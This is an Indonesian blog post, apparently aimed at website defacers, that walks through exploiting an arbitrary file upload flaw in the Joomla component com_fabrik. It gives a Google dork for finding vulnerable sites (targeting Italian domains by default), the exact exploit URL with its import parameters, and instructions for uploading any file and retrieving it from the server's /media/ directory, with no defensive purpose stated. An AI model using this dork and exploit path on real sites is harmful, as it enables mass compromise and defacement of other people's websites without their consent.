Component Fabrik Import CSV Vulnerability



Baik kali ini saya akan sedikit sharing lagi nih ,, mengenai exploit lagi ,, hehe
Component Fabrik ,, ya sebuah plugin / componen untuk mengupload file pada direktori server gan ,, haha
Atau anak - anak defacer nih nyebutnya PoC : Com_fabrik yang anak defacer pasti tau nih ,, hahaha
Okeh langsung saja yuk cekibrot >>
Hal yang pertama seperti biasa gan kita ngandelin Mas Google Dork ,, hehe jadi buka google dan masukan dork berikut :
#Dork :  inurl:index.php?option=com_fabrik site:it  (domain .it bisa diganti sesuai selera)

Nah nanti bakal ada banyak website disitu pilihlah yang mana saja yang sekiranya vuln gan :3 hehe
masukan #Exploit : index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Jadi : http://situs.anu/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

Nah nant bakal ada penampakan seperti berikut gan ,, kalo gak ada tinggalis saja ( penampilan bisa berbeda beda)


Tinggal chose file untuk memilih file yang akan diupload ,, terus klik tombol "Import CSV" (default)
Jika sudah ,, silahkan periksa file agan di direktori /media/filekamu.anu
Jadi : http://situs.anu/media/filekamu.anu
Subscribe To Get Best Articles!

Jika menurut kalian artikel di blog ini berkualitas dan bermanfaat, silahkan berlangganan artikel terbaru melalui pesan masuk email anda secara gratis.

1 comment:

" Terimakasih telah mengunjungi blog kami ,, silahkan tinggalkan komentar untuk menghargai jerit payah penulis ^_^ "